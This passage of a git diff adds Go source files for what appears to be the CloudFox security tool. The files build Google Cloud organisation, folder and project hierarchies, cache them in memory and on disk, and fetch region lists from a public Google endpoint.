display name + OrgID string // Parent org ID (empty if 
standalone/unknown) + FolderID string // Direct parent folder ID (empty if directly under org) +} + +// ------------------------------ +// Ancestry Node (for building hierarchy) +// ------------------------------ + +// AncestryNode represents a node in the resource hierarchy ancestry +type AncestryNode struct { + Type string // organization, folder, project + ID string + DisplayName string + Parent string + Depth int +} + +// OrganizationData represents organization info for hierarchy building +type OrganizationData struct { + Name string // organizations/ORGID + DisplayName string +} + +// ------------------------------ +// Hierarchy Builder Interface +// ------------------------------ + +// HierarchyDataProvider interface allows fetching hierarchy data without import cycles +type HierarchyDataProvider interface { + GetProjectAncestry(projectID string) ([]AncestryNode, error) + SearchOrganizations() ([]OrganizationData, error) +} + +// ------------------------------ +// Hierarchy Detection +// ------------------------------ + +// BuildScopeHierarchy analyzes the given projects and discovers their organizational hierarchy. +// It uses the provided HierarchyDataProvider to fetch data without import cycles. +// It attempts to: +// 1. Get org ID from project ancestry for each project +// 2. Get org display names (requires org-level permissions) +// 3. Get folder information (from ancestry data) +// 4. 
Identify standalone projects (no org association) +func BuildScopeHierarchy(projectIDs []string, provider HierarchyDataProvider) (*ScopeHierarchy, error) { + hierarchy := &ScopeHierarchy{ + Organizations: []OrgScope{}, + Folders: []FolderScope{}, + Projects: []ProjectScope{}, + StandaloneProjs: []string{}, + } + + if len(projectIDs) == 0 { + return hierarchy, nil + } + + // Maps to track relationships + orgProjects := make(map[string][]string) // orgID -> projectIDs + projectToOrg := make(map[string]string) // projectID -> orgID + projectToFolder := make(map[string]string) // projectID -> folderID + folderToOrg := make(map[string]string) // folderID -> orgID + folderInfo := make(map[string]FolderScope) // folderID -> FolderScope + projectNames := make(map[string]string) // projectID -> displayName + + // Step 1: Get project ancestry for each project to discover org/folder relationships + for _, projectID := range projectIDs { + ancestry, err := provider.GetProjectAncestry(projectID) + if err != nil { + // Can't get ancestry - mark as standalone for now + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + + // If ancestry is empty, mark as standalone + if len(ancestry) == 0 { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + continue + } + + // Parse ancestry to find org and folder + // Note: ancestry is ordered from org -> folder(s) -> project + var foundOrg, foundFolder string + var lastFolderID string + for _, node := range ancestry { + switch node.Type { + case "organization": + foundOrg = node.ID + case "folder": + lastFolderID = node.ID + folderToOrg[node.ID] = foundOrg + if _, exists := folderInfo[node.ID]; !exists { + folderInfo[node.ID] = FolderScope{ + ID: node.ID, + DisplayName: node.DisplayName, + ParentType: node.Type, + ParentID: "", // Will be filled later + Depth: node.Depth, + } + } + case "project": + projectNames[node.ID] = node.DisplayName + // The folder directly containing this 
project is the last folder we saw + if lastFolderID != "" { + foundFolder = lastFolderID + } + } + } + + if foundOrg != "" { + projectToOrg[projectID] = foundOrg + orgProjects[foundOrg] = append(orgProjects[foundOrg], projectID) + } else { + hierarchy.StandaloneProjs = append(hierarchy.StandaloneProjs, projectID) + } + + if foundFolder != "" { + projectToFolder[projectID] = foundFolder + } + } + + // Step 2: Try to get org display names (requires resourcemanager.organizations.get) + orgDisplayNames := make(map[string]string) + orgAccessible := make(map[string]bool) + + orgs, err := provider.SearchOrganizations() + if err == nil { + for _, org := range orgs { + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgDisplayNames[orgID] = org.DisplayName + orgAccessible[orgID] = true + } + } + + // Step 3: Build organization scopes + for orgID, projIDs := range orgProjects { + orgScope := OrgScope{ + ID: orgID, + DisplayName: orgDisplayNames[orgID], // May be empty + Accessible: orgAccessible[orgID], + ProjectIDs: projIDs, + FolderIDs: []string{}, + } + + // Collect folders for this org + for folderID, fOrgID := range folderToOrg { + if fOrgID == orgID { + orgScope.FolderIDs = append(orgScope.FolderIDs, folderID) + } + } + + hierarchy.Organizations = append(hierarchy.Organizations, orgScope) + } + + // Step 4: Build folder scopes + for folderID, fScope := range folderInfo { + // Find projects directly under this folder + for projID, fID := range projectToFolder { + if fID == folderID { + fScope.ProjectIDs = append(fScope.ProjectIDs, projID) + } + } + hierarchy.Folders = append(hierarchy.Folders, fScope) + } + + // Step 5: Build project scopes + for _, projectID := range projectIDs { + pScope := ProjectScope{ + ID: projectID, + Name: projectNames[projectID], + OrgID: projectToOrg[projectID], + FolderID: projectToFolder[projectID], + } + if pScope.Name == "" { + pScope.Name = projectID // Fallback to ID + } + hierarchy.Projects = append(hierarchy.Projects, pScope) 
+ } + + return hierarchy, nil +} + +// ------------------------------ +// Path Building Functions +// ------------------------------ + +// GetOrgIdentifier returns the best identifier for an org (display name or ID) +func (h *ScopeHierarchy) GetOrgIdentifier(orgID string) string { + for _, org := range h.Organizations { + if org.ID == orgID { + if org.DisplayName != "" { + return org.DisplayName + } + return org.ID + } + } + return orgID +} + +// GetProjectOrg returns the org ID for a project, or empty string if standalone +func (h *ScopeHierarchy) GetProjectOrg(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + return proj.OrgID + } + } + return "" +} + +// GetProjectName returns the display name for a project +func (h *ScopeHierarchy) GetProjectName(projectID string) string { + for _, proj := range h.Projects { + if proj.ID == projectID { + if proj.Name != "" { + return proj.Name + } + return proj.ID + } + } + return projectID +} + +// IsStandalone returns true if the project has no org association +func (h *ScopeHierarchy) IsStandalone(projectID string) bool { + for _, standaloneID := range h.StandaloneProjs { + if standaloneID == projectID { + return true + } + } + return false +} + +// HasOrgAccess returns true if at least one org is accessible +func (h *ScopeHierarchy) HasOrgAccess() bool { + for _, org := range h.Organizations { + if org.Accessible { + return true + } + } + return false +} + +// ------------------------------ +// Output Path Builder +// ------------------------------ + +// sanitizePathComponent removes or replaces invalid characters for directory names +func sanitizePathComponent(name string) string { + // Replace characters invalid on Windows/Linux + re := regexp.MustCompile(`[<>:"/\\|?*\x00-\x1f]`) + sanitized := re.ReplaceAllString(name, "_") + + // Trim spaces and dots from ends (Windows restriction) + sanitized = strings.TrimRight(sanitized, ". ") + sanitized = strings.TrimLeft(sanitized, ". 
") + + // Limit length + if len(sanitized) > 100 { + sanitized = sanitized[:100] + } + + if sanitized == "" { + sanitized = "unknown" + } + + return sanitized +} + +// BuildHierarchicalPath constructs the output path for hierarchical output. +// Parameters: +// - baseDir: Base output directory (e.g., ~/.cloudfox/cloudfox-output) +// - principal: Authenticated account email +// - hierarchy: The detected scope hierarchy +// - scopeType: "organization", "folder", or "project" +// - scopeID: The ID of the scope (orgID, folderID, or projectID) +// +// Returns paths like: +// - Org level: baseDir/cloudfox-output/gcp/principal/[O]org-name/ +// - Folder level: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder-name/ +// - Project under org: baseDir/cloudfox-output/gcp/principal/[O]org-name/[P]project-name/ +// - Project under folder: baseDir/cloudfox-output/gcp/principal/[O]org-name/[F]folder/[P]project/ +// - Standalone project: baseDir/cloudfox-output/gcp/principal/[P]project-name/ +func BuildHierarchicalPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, + scopeType string, + scopeID string, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + switch scopeType { + case "organization": + orgName := hierarchy.GetOrgIdentifier(scopeID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + + case "folder": + // Find the folder and its parent org + var folder *FolderScope + for i := range hierarchy.Folders { + if hierarchy.Folders[i].ID == scopeID { + folder = &hierarchy.Folders[i] + break + } + } + + if folder == nil { + // Fallback - just use folder ID + return filepath.Join(base, "[F]"+sanitizePathComponent(scopeID)) + } + + // Get org path first + orgID := "" + for oID, fIDs := range getOrgFolderMap(hierarchy) { + for _, fID := range fIDs { + if fID == scopeID { + orgID = oID + break + } + } + } + + if orgID != "" { + orgName := hierarchy.GetOrgIdentifier(orgID) + 
folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName)) + } + + // No org found - just folder + folderName := folder.DisplayName + if folderName == "" { + folderName = folder.ID + } + return filepath.Join(base, "[F]"+sanitizePathComponent(folderName)) + + case "project": + projectName := hierarchy.GetProjectName(scopeID) + orgID := hierarchy.GetProjectOrg(scopeID) + + // Standalone project + if orgID == "" || hierarchy.IsStandalone(scopeID) { + return filepath.Join(base, "[P]"+sanitizePathComponent(projectName)) + } + + // Project under org + orgName := hierarchy.GetOrgIdentifier(orgID) + + // Check if project is under a folder + var folderID string + for _, proj := range hierarchy.Projects { + if proj.ID == scopeID && proj.FolderID != "" { + folderID = proj.FolderID + break + } + } + + if folderID != "" { + // Project under folder under org + var folderName string + for _, f := range hierarchy.Folders { + if f.ID == folderID { + folderName = f.DisplayName + if folderName == "" { + folderName = f.ID + } + break + } + } + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[F]"+sanitizePathComponent(folderName), "[P]"+sanitizePathComponent(projectName)) + } + + // Project directly under org + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName), "[P]"+sanitizePathComponent(projectName)) + + default: + // Unknown scope type - use as-is + return filepath.Join(base, sanitizePathComponent(scopeID)) + } +} + +// getOrgFolderMap builds a map of orgID -> folderIDs +func getOrgFolderMap(hierarchy *ScopeHierarchy) map[string][]string { + result := make(map[string][]string) + for _, org := range hierarchy.Organizations { + result[org.ID] = org.FolderIDs + } + return result +} + +// ------------------------------ +// Flat Output Path (Legacy Mode) +// ------------------------------ + +// BuildFlatPath constructs the 
legacy flat output path (for --flat-output mode) +// All data goes to a single folder based on the "highest" scope available +func BuildFlatPath( + baseDir string, + principal string, + hierarchy *ScopeHierarchy, +) string { + base := filepath.Join(baseDir, "cloudfox-output", "gcp", sanitizePathComponent(principal)) + + // If we have org access, use org-level folder + if len(hierarchy.Organizations) > 0 { + // Use first org (or combine if multiple) + if len(hierarchy.Organizations) == 1 { + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)) + } + // Multiple orgs - use combined name + orgName := hierarchy.GetOrgIdentifier(hierarchy.Organizations[0].ID) + return filepath.Join(base, "[O]"+sanitizePathComponent(orgName)+"_and_"+ + sanitizePathComponent(string(rune(len(hierarchy.Organizations)-1)))+"_more") + } + + // No org - use project-level + if len(hierarchy.Projects) > 0 { + if len(hierarchy.Projects) == 1 { + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)) + } + // Multiple projects - use combined name + return filepath.Join(base, "[P]"+sanitizePathComponent(hierarchy.Projects[0].Name)+ + "_and_"+sanitizePathComponent(string(rune(len(hierarchy.Projects)-1)))+"_more") + } + + return filepath.Join(base, "unknown-scope") +} diff --git a/internal/gcp/org_cache.go b/internal/gcp/org_cache.go new file mode 100755 index 00000000..25b71dc0 --- /dev/null +++ b/internal/gcp/org_cache.go @@ -0,0 +1,334 @@ +package gcpinternal + +import ( + "context" + "sync" +) + +// OrgCache holds cached organization, folder, and project data +// This allows modules to access full org enumeration without re-querying +type OrgCache struct { + // All accessible organizations + Organizations []CachedOrganization + + // All accessible folders + Folders []CachedFolder + + // All accessible projects (full enumeration) + AllProjects []CachedProject + + // Quick lookups + 
ProjectByID map[string]*CachedProject + ProjectByNumber map[string]*CachedProject + FolderByID map[string]*CachedFolder + OrgByID map[string]*CachedOrganization + + // Populated indicates whether the cache has been populated + Populated bool + + mu sync.RWMutex +} + +// CachedOrganization represents cached org info +type CachedOrganization struct { + ID string // Numeric org ID + Name string // organizations/ORGID + DisplayName string + DirectoryID string // Cloud Identity directory customer ID + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// CachedFolder represents cached folder info +type CachedFolder struct { + ID string // Folder ID + Name string // folders/FOLDERID + DisplayName string + Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. +} + +// CachedProject represents cached project info +type CachedProject struct { + ID string // Project ID (e.g. "my-project") + Number string // Project number (e.g. "123456789") + Name string // projects/PROJECT_NUMBER + DisplayName string + Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. 
+} + +// NewOrgCache creates a new empty org cache +func NewOrgCache() *OrgCache { + return &OrgCache{ + Organizations: []CachedOrganization{}, + Folders: []CachedFolder{}, + AllProjects: []CachedProject{}, + ProjectByID: make(map[string]*CachedProject), + ProjectByNumber: make(map[string]*CachedProject), + FolderByID: make(map[string]*CachedFolder), + OrgByID: make(map[string]*CachedOrganization), + Populated: false, + } +} + +// AddOrganization adds an organization to the cache +func (c *OrgCache) AddOrganization(org CachedOrganization) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Organizations = append(c.Organizations, org) + c.OrgByID[org.ID] = &c.Organizations[len(c.Organizations)-1] +} + +// AddFolder adds a folder to the cache +func (c *OrgCache) AddFolder(folder CachedFolder) { + c.mu.Lock() + defer c.mu.Unlock() + + c.Folders = append(c.Folders, folder) + c.FolderByID[folder.ID] = &c.Folders[len(c.Folders)-1] +} + +// AddProject adds a project to the cache +func (c *OrgCache) AddProject(project CachedProject) { + c.mu.Lock() + defer c.mu.Unlock() + + c.AllProjects = append(c.AllProjects, project) + ptr := &c.AllProjects[len(c.AllProjects)-1] + c.ProjectByID[project.ID] = ptr + if project.Number != "" { + c.ProjectByNumber[project.Number] = ptr + } +} + +// MarkPopulated marks the cache as populated +func (c *OrgCache) MarkPopulated() { + c.mu.Lock() + defer c.mu.Unlock() + c.Populated = true +} + +// IsPopulated returns whether the cache has been populated +func (c *OrgCache) IsPopulated() bool { + c.mu.RLock() + defer c.mu.RUnlock() + return c.Populated +} + +// GetAllProjectIDs returns all project IDs in the cache +func (c *OrgCache) GetAllProjectIDs() []string { + c.mu.RLock() + defer c.mu.RUnlock() + + ids := make([]string, len(c.AllProjects)) + for i, p := range c.AllProjects { + ids[i] = p.ID + } + return ids +} + +// GetActiveProjectIDs returns only active project IDs +func (c *OrgCache) GetActiveProjectIDs() []string { + c.mu.RLock() + defer 
c.mu.RUnlock() + + var ids []string + for _, p := range c.AllProjects { + if p.State == "ACTIVE" { + ids = append(ids, p.ID) + } + } + return ids +} + +// GetProject returns a project by ID +func (c *OrgCache) GetProject(projectID string) *CachedProject { + c.mu.RLock() + defer c.mu.RUnlock() + return c.ProjectByID[projectID] +} + +// GetProjectIDByNumber returns the project ID for a given project number. +// Returns empty string if not found. +func (c *OrgCache) GetProjectIDByNumber(number string) string { + c.mu.RLock() + defer c.mu.RUnlock() + if p, ok := c.ProjectByNumber[number]; ok { + return p.ID + } + return "" +} + +// GetFolder returns a folder by ID +func (c *OrgCache) GetFolder(folderID string) *CachedFolder { + c.mu.RLock() + defer c.mu.RUnlock() + return c.FolderByID[folderID] +} + +// GetOrganization returns an organization by ID +func (c *OrgCache) GetOrganization(orgID string) *CachedOrganization { + c.mu.RLock() + defer c.mu.RUnlock() + return c.OrgByID[orgID] +} + +// GetStats returns statistics about the cache +func (c *OrgCache) GetStats() (orgs, folders, projects int) { + c.mu.RLock() + defer c.mu.RUnlock() + return len(c.Organizations), len(c.Folders), len(c.AllProjects) +} + +// HasProject returns true if the project ID exists in the org cache +func (c *OrgCache) HasProject(projectID string) bool { + c.mu.RLock() + defer c.mu.RUnlock() + _, exists := c.ProjectByID[projectID] + return exists +} + +// GetProjectScope returns the scope of a project relative to the org cache: +// - "Internal" if the project is in the cache (part of enumerated org) +// - "External" if the cache is populated but project is not in it +// - "Unknown" if the cache is not populated +func (c *OrgCache) GetProjectScope(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + if !c.Populated { + return "Unknown" + } + + if _, exists := c.ProjectByID[projectID]; exists { + return "Internal" + } + return "External" +} + +// GetProjectsInOrg returns all project 
IDs belonging to an organization +func (c *OrgCache) GetProjectsInOrg(orgID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + var ids []string + orgPrefix := "organizations/" + orgID + + // Direct children of org + for _, p := range c.AllProjects { + if p.Parent == orgPrefix { + ids = append(ids, p.ID) + } + } + + // Children of folders in this org (simplified - doesn't handle nested folders) + for _, f := range c.Folders { + if f.Parent == orgPrefix { + folderPrefix := "folders/" + f.ID + for _, p := range c.AllProjects { + if p.Parent == folderPrefix { + ids = append(ids, p.ID) + } + } + } + } + + return ids +} + +// GetProjectAncestorFolders returns all folder IDs in the ancestry path for a project. +// This walks up from the project's parent through all nested folders. +func (c *OrgCache) GetProjectAncestorFolders(projectID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return nil + } + + var folderIDs []string + currentParent := project.Parent + + // Walk up the folder chain + for { + if currentParent == "" { + break + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + folderIDs = append(folderIDs, folderID) + + // Get next parent + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + // Parent is an org or unknown, stop here + break + } + } + + return folderIDs +} + +// GetProjectOrgID returns the organization ID for a project. +// Returns empty string if the project is not found or has no org. 
+func (c *OrgCache) GetProjectOrgID(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return "" + } + + currentParent := project.Parent + + // Walk up until we find an org + for { + if currentParent == "" { + break + } + + // Check if parent is an org + if len(currentParent) > 14 && currentParent[:14] == "organizations/" { + return currentParent[14:] + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + break + } + } + + return "" +} + +// Context key for org cache +type orgCacheKey struct{} + +// GetOrgCacheFromContext retrieves the org cache from context +func GetOrgCacheFromContext(ctx context.Context) *OrgCache { + if cache, ok := ctx.Value(orgCacheKey{}).(*OrgCache); ok { + return cache + } + return nil +} + +// SetOrgCacheInContext returns a new context with the org cache +func SetOrgCacheInContext(ctx context.Context, cache *OrgCache) context.Context { + return context.WithValue(ctx, orgCacheKey{}, cache) +} diff --git a/internal/gcp/persistent_cache.go b/internal/gcp/persistent_cache.go new file mode 100644 index 00000000..ff4016c0 --- /dev/null +++ b/internal/gcp/persistent_cache.go @@ -0,0 +1,269 @@ +package gcpinternal + +import ( + "encoding/gob" + "encoding/json" + "fmt" + "io" + "os" + "path/filepath" + "time" +) + +// DefaultCacheExpiration is the default time after which cache is considered stale +// and will be automatically refreshed +const DefaultCacheExpiration = 24 * time.Hour + +// atomicWriteGob writes data to a file atomically using a temp file and rename +// This prevents corruption if the process is interrupted during write +func atomicWriteGob(filename string, data interface{}) error { + // Create temp file in the same directory (required for atomic rename) + 
dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*.gob") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + // Ensure cleanup on failure + success := false + defer func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + // Encode to temp file + encoder := gob.NewEncoder(tempFile) + if err := encoder.Encode(data); err != nil { + return fmt.Errorf("failed to encode data: %w", err) + } + + // Sync to ensure data is written to disk + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync temp file: %w", err) + } + + // Close before rename + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close temp file: %w", err) + } + + // Atomic rename + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename temp file: %w", err) + } + + success = true + return nil +} + +// atomicWriteFile writes data to a file atomically +func atomicWriteFile(filename string, data []byte, perm os.FileMode) error { + dir := filepath.Dir(filename) + tempFile, err := os.CreateTemp(dir, ".tmp-*") + if err != nil { + return fmt.Errorf("failed to create temp file: %w", err) + } + tempName := tempFile.Name() + + success := false + defer func() { + if !success { + tempFile.Close() + os.Remove(tempName) + } + }() + + if _, err := io.WriteString(tempFile, string(data)); err != nil { + return fmt.Errorf("failed to write data: %w", err) + } + + if err := tempFile.Chmod(perm); err != nil { + return fmt.Errorf("failed to set permissions: %w", err) + } + + if err := tempFile.Sync(); err != nil { + return fmt.Errorf("failed to sync: %w", err) + } + + if err := tempFile.Close(); err != nil { + return fmt.Errorf("failed to close: %w", err) + } + + if err := os.Rename(tempName, filename); err != nil { + return fmt.Errorf("failed to rename: %w", err) + } + + success = true + return nil +} + +// CacheMetadata holds information 
about when the cache was created +type CacheMetadata struct { + CreatedAt time.Time `json:"created_at"` + Account string `json:"account"` + Version string `json:"version"` + ProjectsIn []string `json:"projects_in,omitempty"` // Projects used when creating cache + TotalProjects int `json:"total_projects,omitempty"` // Total projects in org (for org cache) +} + +// PersistentOrgCache is the serializable version of OrgCache +type PersistentOrgCache struct { + Metadata CacheMetadata `json:"metadata"` + Organizations []CachedOrganization `json:"organizations"` + Folders []CachedFolder `json:"folders"` + AllProjects []CachedProject `json:"all_projects"` +} + +// GetCacheDirectory returns the cache directory for a given account +func GetCacheDirectory(baseDir, account string) string { + // Sanitize account email for use in path + sanitized := sanitizeForPath(account) + return filepath.Join(baseDir, "cached-data", "gcp", sanitized) +} + +// sanitizeForPath removes/replaces characters that are problematic in file paths +func sanitizeForPath(s string) string { + // Replace @ and other special chars with underscores + result := make([]byte, 0, len(s)) + for i := 0; i < len(s); i++ { + c := s[i] + if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '-' || c == '_' || c == '.' 
{ + result = append(result, c) + } else { + result = append(result, '_') + } + } + return string(result) +} + +// OrgCacheFilename returns the filename for org cache +func OrgCacheFilename() string { + return "org-cache.gob" +} + +// SaveOrgCacheToFile saves the org cache to a gob file using atomic write +func SaveOrgCacheToFile(cache *OrgCache, baseDir, account, version string) error { + cacheDir := GetCacheDirectory(baseDir, account) + if err := os.MkdirAll(cacheDir, 0755); err != nil { + return fmt.Errorf("failed to create cache directory: %w", err) + } + + persistent := PersistentOrgCache{ + Metadata: CacheMetadata{ + CreatedAt: time.Now(), + Account: account, + Version: version, + TotalProjects: len(cache.AllProjects), + }, + Organizations: cache.Organizations, + Folders: cache.Folders, + AllProjects: cache.AllProjects, + } + + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + // Use atomic write: write to temp file, then rename + if err := atomicWriteGob(filename, persistent); err != nil { + return fmt.Errorf("failed to write cache file: %w", err) + } + + // Also save JSON for debugging/inspection + jsonFilename := filepath.Join(cacheDir, "org-cache.json") + jsonData, err := json.MarshalIndent(persistent, "", " ") + if err == nil { + atomicWriteFile(jsonFilename, jsonData, 0644) + } + + return nil +} + +// LoadOrgCacheFromFile loads the org cache from a gob file +func LoadOrgCacheFromFile(baseDir, account string) (*OrgCache, *CacheMetadata, error) { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + + file, err := os.Open(filename) + if err != nil { + if os.IsNotExist(err) { + return nil, nil, nil // Cache doesn't exist, not an error + } + return nil, nil, fmt.Errorf("failed to open cache file: %w", err) + } + defer file.Close() + + var persistent PersistentOrgCache + decoder := gob.NewDecoder(file) + if err := decoder.Decode(&persistent); err != nil { + return nil, nil, fmt.Errorf("failed 
to decode cache: %w", err) + } + + // Convert to in-memory cache + cache := NewOrgCache() + for _, org := range persistent.Organizations { + cache.AddOrganization(org) + } + for _, folder := range persistent.Folders { + cache.AddFolder(folder) + } + for _, project := range persistent.AllProjects { + cache.AddProject(project) + } + cache.MarkPopulated() + + return cache, &persistent.Metadata, nil +} + +// OrgCacheExists checks if an org cache file exists +func OrgCacheExists(baseDir, account string) bool { + cacheDir := GetCacheDirectory(baseDir, account) + filename := filepath.Join(cacheDir, OrgCacheFilename()) + _, err := os.Stat(filename) + return err == nil +} + +// GetCacheAge returns how old a cache file is +func GetCacheAge(baseDir, account, cacheType string) (time.Duration, error) { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + default: + return 0, fmt.Errorf("unknown cache type: %s", cacheType) + } + + info, err := os.Stat(filename) + if err != nil { + return 0, err + } + + return time.Since(info.ModTime()), nil +} + +// IsCacheStale checks if a cache is older than the given duration +func IsCacheStale(baseDir, account, cacheType string, maxAge time.Duration) bool { + age, err := GetCacheAge(baseDir, account, cacheType) + if err != nil { + return true // If we can't determine age, consider it stale + } + return age > maxAge +} + +// DeleteCache removes a cache file +func DeleteCache(baseDir, account, cacheType string) error { + cacheDir := GetCacheDirectory(baseDir, account) + var filename string + switch cacheType { + case "org": + filename = filepath.Join(cacheDir, OrgCacheFilename()) + // Also remove JSON + os.Remove(filepath.Join(cacheDir, "org-cache.json")) + default: + return fmt.Errorf("unknown cache type: %s", cacheType) + } + + return os.Remove(filename) +} diff --git a/internal/gcp/regions.go b/internal/gcp/regions.go new file 
mode 100644 index 00000000..e7915e75 --- /dev/null +++ b/internal/gcp/regions.go @@ -0,0 +1,201 @@ +package gcpinternal + +import ( + "encoding/json" + "fmt" + "net/http" + "sort" + "strings" + "sync" + "time" +) + +// GCPCloudIPRangesURL is the public Google endpoint that lists all GCP regions +// This endpoint requires no authentication and is updated by Google +const GCPCloudIPRangesURL = "https://www.gstatic.com/ipranges/cloud.json" + +// cloudIPRangesResponse represents the JSON structure from cloud.json +type cloudIPRangesResponse struct { + SyncToken string `json:"syncToken"` + CreationTime string `json:"creationTime"` + Prefixes []cloudPrefix `json:"prefixes"` +} + +// cloudPrefix represents a single IP prefix entry +type cloudPrefix struct { + IPv4Prefix string `json:"ipv4Prefix,omitempty"` + IPv6Prefix string `json:"ipv6Prefix,omitempty"` + Service string `json:"service"` + Scope string `json:"scope"` +} + +// cachedRegions holds the cached region list with expiration +var ( + cachedRegions []string + cachedZones []string + regionsCacheTime time.Time + regionsCacheMutex sync.RWMutex + regionsCacheTTL = 24 * time.Hour +) + +// GetGCPRegions returns a list of all GCP regions from the public cloud.json endpoint +// This does not require any GCP authentication or permissions +// Results are cached for 24 hours +func GetGCPRegions() ([]string, error) { + regionsCacheMutex.RLock() + if len(cachedRegions) > 0 && time.Since(regionsCacheTime) < regionsCacheTTL { + regions := make([]string, len(cachedRegions)) + copy(regions, cachedRegions) + regionsCacheMutex.RUnlock() + return regions, nil + } + regionsCacheMutex.RUnlock() + + // Fetch fresh data + regions, err := fetchGCPRegionsFromPublicEndpoint() + if err != nil { + return nil, err + } + + // Cache the results + regionsCacheMutex.Lock() + cachedRegions = regions + regionsCacheTime = time.Now() + regionsCacheMutex.Unlock() + + return regions, nil +} + +// fetchGCPRegionsFromPublicEndpoint fetches regions from 
the public Google endpoint +func fetchGCPRegionsFromPublicEndpoint() ([]string, error) { + client := &http.Client{Timeout: 10 * time.Second} + resp, err := client.Get(GCPCloudIPRangesURL) + if err != nil { + return nil, fmt.Errorf("failed to fetch GCP regions: %w", err) + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + return nil, fmt.Errorf("failed to fetch GCP regions: HTTP %d", resp.StatusCode) + } + + var data cloudIPRangesResponse + if err := json.NewDecoder(resp.Body).Decode(&data); err != nil { + return nil, fmt.Errorf("failed to parse GCP regions response: %w", err) + } + + // Extract unique regions from scopes + regionSet := make(map[string]bool) + for _, prefix := range data.Prefixes { + scope := prefix.Scope + // Skip global and empty scopes + if scope == "" || scope == "global" { + continue + } + // Only include scopes that look like regions (contain a hyphen and number) + if strings.Contains(scope, "-") && containsDigit(scope) { + regionSet[scope] = true + } + } + + // Convert to sorted slice + regions := make([]string, 0, len(regionSet)) + for region := range regionSet { + regions = append(regions, region) + } + sort.Strings(regions) + + return regions, nil +} + +// GetGCPZonesForRegion returns common zone suffixes for a region +// GCP zones are typically region + letter suffix (a, b, c, d, etc.) 
+func GetGCPZonesForRegion(region string) []string { + // Most regions have zones a, b, c; some have more + commonSuffixes := []string{"a", "b", "c", "d", "f"} + zones := make([]string, len(commonSuffixes)) + for i, suffix := range commonSuffixes { + zones[i] = region + "-" + suffix + } + return zones +} + +// GetAllGCPZones returns all possible zones for all regions +// This is a best-effort list based on common zone naming patterns +func GetAllGCPZones() ([]string, error) { + regions, err := GetGCPRegions() + if err != nil { + return nil, err + } + + var zones []string + for _, region := range regions { + zones = append(zones, GetGCPZonesForRegion(region)...) + } + return zones, nil +} + +// containsDigit checks if a string contains at least one digit +func containsDigit(s string) bool { + for _, c := range s { + if c >= '0' && c <= '9' { + return true + } + } + return false +} + +// CommonGCPRegions is a hardcoded fallback list of common GCP regions +// Used if the public endpoint is unavailable +var CommonGCPRegions = []string{ + "africa-south1", + "asia-east1", + "asia-east2", + "asia-northeast1", + "asia-northeast2", + "asia-northeast3", + "asia-south1", + "asia-south2", + "asia-southeast1", + "asia-southeast2", + "australia-southeast1", + "australia-southeast2", + "europe-central2", + "europe-north1", + "europe-southwest1", + "europe-west1", + "europe-west2", + "europe-west3", + "europe-west4", + "europe-west6", + "europe-west8", + "europe-west9", + "europe-west10", + "europe-west12", + "me-central1", + "me-central2", + "me-west1", + "northamerica-northeast1", + "northamerica-northeast2", + "southamerica-east1", + "southamerica-west1", + "us-central1", + "us-east1", + "us-east4", + "us-east5", + "us-south1", + "us-west1", + "us-west2", + "us-west3", + "us-west4", +} + +// GetGCPRegionsWithFallback returns regions from the public endpoint, +// falling back to the hardcoded list if the endpoint is unavailable +func GetGCPRegionsWithFallback() []string { + 
